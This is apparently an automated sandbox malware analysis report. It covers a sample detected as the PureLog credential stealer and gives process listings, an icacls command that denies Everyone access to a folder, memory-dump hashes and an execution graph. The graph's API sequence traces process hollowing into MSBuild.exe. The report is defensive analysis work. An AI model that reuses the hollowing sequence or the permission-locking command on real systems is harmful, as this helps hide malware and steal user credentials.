                                          Imagebase:0xe00000
                                          File size:7'043'584 bytes
                                          MD5 hash:C5FBFA06070EF1EA150FA88E1B6C6684
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:39
                                          Start time:03:31:35
                                          Start date:25/05/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                          Imagebase:0x7ff7e52b0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:40
                                          Start time:03:31:35
                                          Start date:25/05/2024
                                          Path:C:\Windows\SysWOW64\icacls.exe
                                          Wow64 process (32bit):true
                                          Commandline:icacls "C:\Users\user\AppData\Local\cd606818-a84b-463e-828b-b93214ba547c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                          Imagebase:0x40000
                                          File size:29'696 bytes
                                          MD5 hash:2E49585E4E08565F52090B144062F97E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:41
                                          Start time:03:31:36
                                          Start date:25/05/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                          Imagebase:0xee0000
                                          File size:262'432 bytes
                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000029.00000002.2465855956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          Has exited:true

                                          Reset < >
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 04423000, based on PE: false
                                            • Associated: 00000000.00000003.2166181794.00000000043FF000.00000004.00000020.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4423000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d7340430439ff0178837ea4c7ce95066d010147648a39f67a3ee98a29a768201
                                            • Instruction ID: a7f271cad1575f50449f93c1f6de2767cd1b8ff00e49f2747837ea123eb243b9
                                            • Opcode Fuzzy Hash: d7340430439ff0178837ea4c7ce95066d010147648a39f67a3ee98a29a768201
                                            • Instruction Fuzzy Hash: A4023D75E00219DFDF54CFA9C9906AEB7F1EF88324F19416ED819EB384D731AA418B90
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 04420000, based on PE: false
                                            • Associated: 00000000.00000003.2166181794.00000000043FF000.00000004.00000020.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4423000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d7340430439ff0178837ea4c7ce95066d010147648a39f67a3ee98a29a768201
                                            • Instruction ID: a7f271cad1575f50449f93c1f6de2767cd1b8ff00e49f2747837ea123eb243b9
                                            • Opcode Fuzzy Hash: d7340430439ff0178837ea4c7ce95066d010147648a39f67a3ee98a29a768201
                                            • Instruction Fuzzy Hash: A4023D75E00219DFDF54CFA9C9906AEB7F1EF88324F19416ED819EB384D731AA418B90
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 0448C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4423000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d7340430439ff0178837ea4c7ce95066d010147648a39f67a3ee98a29a768201
                                            • Instruction ID: a7f271cad1575f50449f93c1f6de2767cd1b8ff00e49f2747837ea123eb243b9
                                            • Opcode Fuzzy Hash: d7340430439ff0178837ea4c7ce95066d010147648a39f67a3ee98a29a768201
                                            • Instruction Fuzzy Hash: A4023D75E00219DFDF54CFA9C9906AEB7F1EF88324F19416ED819EB384D731AA418B90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 04477000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4477000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID: _com_issue_error
                                            • String ID:
                                            • API String ID: 2162355165-0
                                            • Opcode ID: 96b57724e4a87a672c22f466a95399eed7d6d0378f62befbb2c52991f6f76a0d
                                            • Instruction ID: 50cfa29ad7845ea1452a169d5b9554b957cb6d1c51d6f65e02577495380d5e8e
                                            • Opcode Fuzzy Hash: 96b57724e4a87a672c22f466a95399eed7d6d0378f62befbb2c52991f6f76a0d
                                            • Instruction Fuzzy Hash: 6A41B5B1A00219ABEF109F69DC44BEEF7B9EF48718F10422AE545E7280D735B5018BF5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 04423000, based on PE: false
                                            • Associated: 00000000.00000003.2166181794.00000000043FF000.00000004.00000020.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4477000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID: _com_issue_error
                                            • String ID:
                                            • API String ID: 2162355165-0
                                            • Opcode ID: 96b57724e4a87a672c22f466a95399eed7d6d0378f62befbb2c52991f6f76a0d
                                            • Instruction ID: 50cfa29ad7845ea1452a169d5b9554b957cb6d1c51d6f65e02577495380d5e8e
                                            • Opcode Fuzzy Hash: 96b57724e4a87a672c22f466a95399eed7d6d0378f62befbb2c52991f6f76a0d
                                            • Instruction Fuzzy Hash: 6A41B5B1A00219ABEF109F69DC44BEEF7B9EF48718F10422AE545E7280D735B5018BF5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 04420000, based on PE: false
                                            • Associated: 00000000.00000003.2166181794.00000000043FF000.00000004.00000020.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4477000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID: _com_issue_error
                                            • String ID:
                                            • API String ID: 2162355165-0
                                            • Opcode ID: 96b57724e4a87a672c22f466a95399eed7d6d0378f62befbb2c52991f6f76a0d
                                            • Instruction ID: 50cfa29ad7845ea1452a169d5b9554b957cb6d1c51d6f65e02577495380d5e8e
                                            • Opcode Fuzzy Hash: 96b57724e4a87a672c22f466a95399eed7d6d0378f62befbb2c52991f6f76a0d
                                            • Instruction Fuzzy Hash: 6A41B5B1A00219ABEF109F69DC44BEEF7B9EF48718F10422AE545E7280D735B5018BF5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 0448C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4477000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID: _com_issue_error
                                            • String ID:
                                            • API String ID: 2162355165-0
                                            • Opcode ID: 96b57724e4a87a672c22f466a95399eed7d6d0378f62befbb2c52991f6f76a0d
                                            • Instruction ID: 50cfa29ad7845ea1452a169d5b9554b957cb6d1c51d6f65e02577495380d5e8e
                                            • Opcode Fuzzy Hash: 96b57724e4a87a672c22f466a95399eed7d6d0378f62befbb2c52991f6f76a0d
                                            • Instruction Fuzzy Hash: 6A41B5B1A00219ABEF109F69DC44BEEF7B9EF48718F10422AE545E7280D735B5018BF5
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 044B9C1F
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 044B9CD3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 04477000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4477000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 87c47c86b8044d0aeeca0e1fc5ce46c155ec8326e793866ca2b552f28975c0a7
                                            • Instruction ID: 088aabedc38db0daaddb8628727870a09bbe5d6e62222c31c7ca4adaa9691adc
                                            • Opcode Fuzzy Hash: 87c47c86b8044d0aeeca0e1fc5ce46c155ec8326e793866ca2b552f28975c0a7
                                            • Instruction Fuzzy Hash: 7141C3B4A00208ABDF11DF69C880ADE7BF5FF45318F14815AE9556B392D735B901CBE1
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 044B9C1F
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 044B9CD3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 04423000, based on PE: false
                                            • Associated: 00000000.00000003.2166181794.00000000043FF000.00000004.00000020.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4477000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 87c47c86b8044d0aeeca0e1fc5ce46c155ec8326e793866ca2b552f28975c0a7
                                            • Instruction ID: 088aabedc38db0daaddb8628727870a09bbe5d6e62222c31c7ca4adaa9691adc
                                            • Opcode Fuzzy Hash: 87c47c86b8044d0aeeca0e1fc5ce46c155ec8326e793866ca2b552f28975c0a7
                                            • Instruction Fuzzy Hash: 7141C3B4A00208ABDF11DF69C880ADE7BF5FF45318F14815AE9556B392D735B901CBE1
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 044B9C1F
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 044B9CD3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 04420000, based on PE: false
                                            • Associated: 00000000.00000003.2166181794.00000000043FF000.00000004.00000020.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4477000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 87c47c86b8044d0aeeca0e1fc5ce46c155ec8326e793866ca2b552f28975c0a7
                                            • Instruction ID: 088aabedc38db0daaddb8628727870a09bbe5d6e62222c31c7ca4adaa9691adc
                                            • Opcode Fuzzy Hash: 87c47c86b8044d0aeeca0e1fc5ce46c155ec8326e793866ca2b552f28975c0a7
                                            • Instruction Fuzzy Hash: 7141C3B4A00208ABDF11DF69C880ADE7BF5FF45318F14815AE9556B392D735B901CBE1
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 044B9C1F
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 044B9CD3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, Offset: 0448C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4477000_CHA0VZiz8y.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 87c47c86b8044d0aeeca0e1fc5ce46c155ec8326e793866ca2b552f28975c0a7
                                            • Instruction ID: 088aabedc38db0daaddb8628727870a09bbe5d6e62222c31c7ca4adaa9691adc
                                            • Opcode Fuzzy Hash: 87c47c86b8044d0aeeca0e1fc5ce46c155ec8326e793866ca2b552f28975c0a7
                                            • Instruction Fuzzy Hash: 7141C3B4A00208ABDF11DF69C880ADE7BF5FF45318F14815AE9556B392D735B901CBE1

                                            Execution Graph

                                            Execution Coverage:1.7%
                                            Dynamic/Decrypted Code Coverage:13%
                                            Signature Coverage:6.1%
                                            Total number of Nodes:293
                                            Total number of Limit Nodes:35
                                            execution_graph 40731 402040 40732 40204e 40731->40732 40735 402087 40732->40735 40736 402059 40735->40736 40737 40208d 40735->40737 40739 402098 std::exception::exception 40737->40739 40742 403bae 40737->40742 40739->40736 40784 403d8f 40739->40784 40741 402274 40745 403bb6 _malloc 40742->40745 40744 403bd0 40744->40739 40745->40744 40746 403bd4 std::exception::exception 40745->40746 40787 407cf0 40745->40787 40747 403d8f __CxxThrowException@8 RaiseException 40746->40747 40748 403bfe __alloc_osfhnd 40747->40748 40802 406e4a GetStartupInfoW 40748->40802 40750 403c10 40804 40822e GetProcessHeap 40750->40804 40752 403c68 40753 403c73 40752->40753 40894 403d4f 55 API calls 3 library calls 40752->40894 40805 40819b 40753->40805 40756 403c79 40757 403c84 __RTC_Initialize 40756->40757 40895 403d4f 55 API calls 3 library calls 40756->40895 40826 408243 40757->40826 40760 403c93 40761 403c9f GetCommandLineW 40760->40761 40896 403d4f 55 API calls 3 library calls 40760->40896 40845 4088ff GetEnvironmentStringsW 40761->40845 40764 403c9e 40764->40761 40767 403cb9 40768 403cc4 40767->40768 40897 4038f7 55 API calls 3 library calls 40767->40897 40855 408734 40768->40855 40772 403cd5 40869 403931 40772->40869 40775 403cdd 40776 403ce8 __wwincmdln 40775->40776 40899 4038f7 55 API calls 3 library calls 40775->40899 40875 40177e 40776->40875 40780 403d0b 40903 403922 55 API calls _doexit 40780->40903 40783 403d10 __alloc_osfhnd 40783->40739 40785 403dae RaiseException 40784->40785 40785->40741 40788 407d6b _malloc 40787->40788 40789 407cfc 40787->40789 40909 404929 55 API calls __getptd_noexit 40788->40909 40790 407d07 _malloc 40789->40790 40790->40789 40793 407d2f HeapAlloc 40790->40793 40796 407d57 40790->40796 40799 407d55 40790->40799 40904 4071ad 55 API calls 2 library calls 40790->40904 40905 40720a 55 API calls 6 library calls 40790->40905 40906 4038e1 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 40790->40906 40793->40790 40801 407d63 40793->40801 40794 407d77 40794->40745 40907 404929 55 API calls __getptd_noexit 40796->40907 40908 404929 55 API calls __getptd_noexit 40799->40908 40801->40794 40803 406e60 40802->40803 40803->40750 40804->40752 40910 4039c9 36 API calls 2 library calls 40805->40910 40807 4081a0 40911 406d7e InitializeCriticalSectionAndSpinCount __alloc_osfhnd 40807->40911 40809 4081a5 40810 4081a9 40809->40810 40913 406dcc TlsAlloc 40809->40913 40912 408211 TlsFree __mtterm 40810->40912 40814 4081bb 40814->40810 40815 4081c6 40814->40815 40914 404df6 40815->40914 40818 408208 40922 408211 TlsFree __mtterm 40818->40922 40821 4081e7 40821->40818 40823 4081ed 40821->40823 40921 4080e8 55 API calls 4 library calls 40823->40921 40825 4081f5 GetCurrentThreadId 40825->40756 40827 40824f __alloc_osfhnd 40826->40827 40932 406c4d 40827->40932 40829 408256 40830 404df6 __calloc_crt 55 API calls 40829->40830 40831 408267 40830->40831 40832 4082d2 GetStartupInfoW 40831->40832 40833 408272 __alloc_osfhnd @_EH4_CallFilterFunc@8 40831->40833 40834 408416 40832->40834 40836 4082e7 40832->40836 40833->40760 40835 4084de 40834->40835 40839 408463 GetStdHandle 40834->40839 40840 408476 GetFileType 40834->40840 40940 406e6d InitializeCriticalSectionAndSpinCount 40834->40940 40941 4084ee LeaveCriticalSection _doexit 40835->40941 40836->40834 40838 404df6 __calloc_crt 55 API calls 40836->40838 40844 408335 40836->40844 40838->40836 40839->40834 40840->40834 40841 408369 GetFileType 40841->40844 40844->40834 40844->40841 40939 406e6d InitializeCriticalSectionAndSpinCount 40844->40939 40846 408910 40845->40846 40847 403caf 40845->40847 40944 404e3e 55 API calls 2 library calls 40846->40944 40851 4084f7 GetModuleFileNameW 40847->40851 40849 40894c FreeEnvironmentStringsW 40849->40847 40850 408936 ___crtGetEnvironmentStringsW 40850->40849 40852 40852b _wparse_cmdline 40851->40852 40854 40856b _wparse_cmdline 40852->40854 40945 404e3e 55 API calls 2 library calls 40852->40945 40854->40767 40856 403cca 40855->40856 40858 40874d __NMSG_WRITE 40855->40858 40856->40772 40898 4038f7 55 API calls 3 library calls 40856->40898 40857 404df6 __calloc_crt 55 API calls 40865 408776 __NMSG_WRITE 40857->40865 40858->40857 40859 4087cd 40947 4058ef 55 API calls 2 library calls 40859->40947 40861 404df6 __calloc_crt 55 API calls 40861->40865 40862 4087f2 40948 4058ef 55 API calls 2 library calls 40862->40948 40865->40856 40865->40859 40865->40861 40865->40862 40866 408809 40865->40866 40946 40d0b1 55 API calls __cftog_l 40865->40946 40949 4048ca 8 API calls 2 library calls 40866->40949 40868 408815 40870 40393d __IsNonwritableInCurrentImage 40869->40870 40950 407511 40870->40950 40872 40395b __initterm_e 40874 40397a _doexit __IsNonwritableInCurrentImage 40872->40874 40953 403413 64 API calls __cinit 40872->40953 40874->40775 40876 401ac3 40875->40876 40877 401ad6 GetModuleFileNameA 40876->40877 40878 401acb GetCharWidthI 40876->40878 40879 401af0 40876->40879 40877->40876 40877->40879 40878->40877 40880 401b27 40879->40880 40997 40311d 55 API calls 2 library calls 40879->40997 40881 401b30 GetNumberFormatW GetLastError SetLastError 40880->40881 40884 401b6b 40880->40884 40881->40880 40883 401b03 40998 403720 82 API calls 5 library calls 40883->40998 40954 401530 40884->40954 40887 401b0b 40999 401080 56 API calls __floor_pentium4 40887->40999 40888 401b7a 40892 401b8b GetSystemDirectoryA 40888->40892 40893 401b9d 40888->40893 40890 401b1c 41000 40109f 56 API calls __floor_pentium4 40890->41000 40892->40888 40893->40780 40900 403b9a 40893->40900 40894->40753 40895->40757 40896->40764 41056 403a6b 40900->41056 40902 403ba9 40902->40780 40903->40783 40904->40790 40905->40790 40907->40799 40908->40801 40909->40794 40910->40807 40911->40809 40913->40814 40916 404dfd 40914->40916 40917 404e38 40916->40917 40919 404e1b 40916->40919 40923 404d4b 40916->40923 40917->40818 40920 406e28 TlsSetValue 40917->40920 40919->40916 40919->40917 40930 407174 Sleep 40919->40930 40920->40821 40921->40825 40924 404d56 40923->40924 40929 404d71 _malloc 40923->40929 40925 404d62 40924->40925 40924->40929 40931 404929 55 API calls __getptd_noexit 40925->40931 40927 404d81 HeapAlloc 40928 404d67 40927->40928 40927->40929 40928->40916 40929->40927 40929->40928 40930->40919 40931->40928 40933 406c71 EnterCriticalSection 40932->40933 40934 406c5e 40932->40934 40933->40829 40942 406cd5 55 API calls 9 library calls 40934->40942 40936 406c64 40936->40933 40943 4038f7 55 API calls 3 library calls 40936->40943 40939->40844 40940->40834 40941->40833 40942->40936 40944->40850 40945->40854 40946->40865 40947->40856 40948->40856 40949->40868 40951 407514 EncodePointer 40950->40951 40951->40951 40952 40752e 40951->40952 40952->40872 40953->40874 40955 401546 SetLastError 40954->40955 40956 401551 40955->40956 40957 40155a 40955->40957 40956->40955 40956->40957 40958 401748 CreateEventW 40957->40958 40959 40156c LocalAlloc VirtualProtect 40957->40959 41001 403525 40958->41001 40960 4015a7 SetLastError GetTickCount 40959->40960 40960->40960 40963 4015b3 40960->40963 40964 40163b 40963->40964 40966 4015e1 RemoveDirectoryW IsBadStringPtrA LoadLibraryA GetVolumeInformationA PurgeComm 40963->40966 40968 401647 SetComputerNameExW WriteConsoleW LoadLibraryExW GetConsoleAliasA 40964->40968 40973 40168e 40964->40973 40966->40963 40967 40176d 41011 403428 40967->41011 40968->40964 40970 401774 40971 403b9a 55 API calls 40970->40971 40977 40177d 40971->40977 40972 401696 SetLastError 40972->40973 40973->40972 40979 4016ad 40973->40979 40974 401ad6 GetModuleFileNameA 40976 401af0 40974->40976 40974->40977 40975 401acb GetCharWidthI 40975->40974 40995 401b27 40976->40995 41021 40311d 55 API calls 2 library calls 40976->41021 40977->40974 40977->40975 40977->40976 40978 4016bc TzSpecificLocalTimeToSystemTime WriteConsoleW SetFileAttributesW BuildCommDCBA 40978->40979 40979->40978 40982 401721 CreateEventW 40979->40982 40984 40172e LoadLibraryA 40979->40984 40980 401b30 GetNumberFormatW GetLastError SetLastError 40980->40995 40982->40979 40983 401b03 41022 403720 82 API calls 5 library calls 40983->41022 40989 401741 40984->40989 40985 401b6b 40987 401530 130 API calls 40985->40987 40990 401b7a 40987->40990 40988 401b0b 41023 401080 56 API calls __floor_pentium4 40988->41023 40989->40888 40994 401b8b GetSystemDirectoryA 40990->40994 40996 401b9d 40990->40996 40992 401b1c 41024 40109f 56 API calls __floor_pentium4 40992->41024 40994->40990 40995->40980 40995->40985 40996->40888 40997->40883 40998->40887 40999->40890 41000->40880 41025 403461 41001->41025 41003 401767 41004 402986 41003->41004 41005 402990 41004->41005 41006 4029a4 41004->41006 41051 404929 55 API calls __getptd_noexit 41005->41051 41006->40967 41008 402995 41052 4048ba 8 API calls __cftog_l 41008->41052 41010 4029a0 41010->40967 41012 403431 41011->41012 41013 403446 41011->41013 41053 404929 55 API calls __getptd_noexit 41012->41053 41013->41012 41014 40344d 41013->41014 41055 4050c4 78 API calls 5 library calls 41014->41055 41016 403436 41054 4048ba 8 API calls __cftog_l 41016->41054 41019 40345c 41019->40970 41020 403441 41020->40970 41021->40983 41022->40988 41023->40992 41024->40995 41028 40346d __alloc_osfhnd 41025->41028 41026 40347f 41044 404929 55 API calls __getptd_noexit 41026->41044 41028->41026 41030 4034ac 41028->41030 41029 403484 41045 4048ba 8 API calls __cftog_l 41029->41045 41046 4053f3 58 API calls 5 library calls 41030->41046 41033 4034b1 41034 4034c7 41033->41034 41035 4034ba 41033->41035 41037 4034f0 41034->41037 41038 4034d0 41034->41038 41047 404929 55 API calls __getptd_noexit 41035->41047 41049 405512 118 API calls 3 library calls 41037->41049 41048 404929 55 API calls __getptd_noexit 41038->41048 41039 40348f __alloc_osfhnd @_EH4_CallFilterFunc@8 41039->41003 41042 4034fb 41050 40351d LeaveCriticalSection LeaveCriticalSection __fsopen 41042->41050 41044->41029 41045->41039 41046->41033 41047->41039 41048->41039 41049->41042 41050->41039 41051->41008 41052->41010 41053->41016 41054->41020 41055->41019 41057 403a77 __alloc_osfhnd 41056->41057 41058 406c4d __lock 48 API calls 41057->41058 41059 403a7e 41058->41059 41060 403b37 _doexit 41059->41060 41061 403aac DecodePointer 41059->41061 41077 403b85 LeaveCriticalSection _doexit 41060->41077 41061->41060 41064 403ac3 DecodePointer 41061->41064 41063 403b65 41065 403b94 __alloc_osfhnd 41063->41065 41066 403b6b 41063->41066 41070 403ad3 41064->41070 41065->40902 41078 406db7 LeaveCriticalSection 41066->41078 41068 403ae0 EncodePointer 41068->41070 41069 403b7c 41079 4038e1 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 41069->41079 41070->41060 41070->41068 41072 403af0 DecodePointer EncodePointer 41070->41072 41075 403b02 DecodePointer DecodePointer 41072->41075 41075->41070 41077->41063 41078->41069 41080 2210000 41083 2210630 41080->41083 41082 2210005 41084 221064c 41083->41084 41086 2211577 41084->41086 41089 22105b0 41086->41089 41092 22105dc 41089->41092 41090 22105e2 GetFileAttributesA 41090->41092 41091 221061e 41092->41090 41092->41091 41094 2210420 41092->41094 41095 22104f3 41094->41095 41096 22104fa 41095->41096 41097 22104ff CreateWindowExA 41095->41097 41096->41092 41097->41096 41098 2210540 PostMessageA 41097->41098 41099 221055f 41098->41099 41099->41096 41101 2210110 VirtualAlloc GetModuleFileNameA 41099->41101 41102 2210414 41101->41102 41103 221017d CreateProcessA 41101->41103 41102->41099 41103->41102 41105 221025f VirtualFree VirtualAlloc Wow64GetThreadContext 41103->41105 41105->41102 41106 22102a9 ReadProcessMemory 41105->41106 41107 22102e5 VirtualAllocEx NtWriteVirtualMemory 41106->41107 41108 22102d5 NtUnmapViewOfSection 41106->41108 41109 221033b 41107->41109 41108->41107 41110 2210350 NtWriteVirtualMemory 41109->41110 41111 221039d WriteProcessMemory Wow64SetThreadContext ResumeThread 41109->41111 41110->41109 41112 22103fb ExitProcess 41111->41112 41114 2170026 41115 2170035 41114->41115 41118 21707c6 41115->41118 41119 21707e1 41118->41119 41120 21707ea CreateToolhelp32Snapshot 41119->41120 41121 2170806 Module32First 41119->41121 41120->41119 41120->41121 41122 2170815 41121->41122 41123 217003e 41121->41123 41125 2170485 41122->41125 41126 21704b0 41125->41126 41127 21704c1 VirtualAlloc 41126->41127 41128 21704f9 41126->41128 41127->41128 41128->41128

                                            Control-flow Graph

                                            APIs
                                            • GetCharWidthI.GDI32(00000000,00000000,00000000,00000000,00000000,7104DC19,4DDEDD50,32F16B60,185911A7,511CF560,39E28F6C,127C64A9,39C630B1,21870240,7EA84DC7,7EA84DC7), ref: 00401AD0
                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000000,7104DC19,4DDEDD50,32F16B60,185911A7,511CF560,39E28F6C,127C64A9,39C630B1,21870240,7EA84DC7,7EA84DC7,4441C554,4E757E39), ref: 00401AD9
                                            • _calloc.LIBCMT ref: 00401AFE
                                            • _fseek.LIBCMT ref: 00401B06
                                            • GetNumberFormatW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B3D
                                            • GetLastError.KERNEL32 ref: 00401B43
                                            • SetLastError.KERNEL32(00000000), ref: 00401B4A
                                            • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 00401B94
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CharDirectoryFileFormatModuleNameNumberSystemWidth_calloc_fseek
                                            • String ID: 8*@$8Y<6$9~uN$?<l-$E%os$r$z&i>
                                            • API String ID: 576434963-2732166875
                                            • Opcode ID: ab12873d7130227bdc8abd491444833df2d3a03ed6623730f2fa6fe7d6ff1de2
                                            • Instruction ID: 8c9c9f69fba74422944eb6b5350edcb967ebf87d1715c23092927a671499f125
                                            • Opcode Fuzzy Hash: ab12873d7130227bdc8abd491444833df2d3a03ed6623730f2fa6fe7d6ff1de2
                                            • Instruction Fuzzy Hash: 95A140B15083809FC210CF2A958850BFBF4FF95714F508A1CF5AAA6621D774CA89CF8B

                                            Control-flow Graph

                                            APIs
                                            • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02210156
                                            • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0221016C
                                            • CreateProcessA.KERNELBASE(?,00000000), ref: 02210255
                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02210270
                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02210283
                                            • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0221029F
                                            • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022102C8
                                            • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022102E3
                                            • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02210304
                                            • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0221032A
                                            • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02210399
                                            • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022103BF
                                            • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022103E1
                                            • ResumeThread.KERNELBASE(00000000), ref: 022103ED
                                            • ExitProcess.KERNEL32(00000000), ref: 02210412
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                            • String ID:
                                            • API String ID: 93872480-0
                                            • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
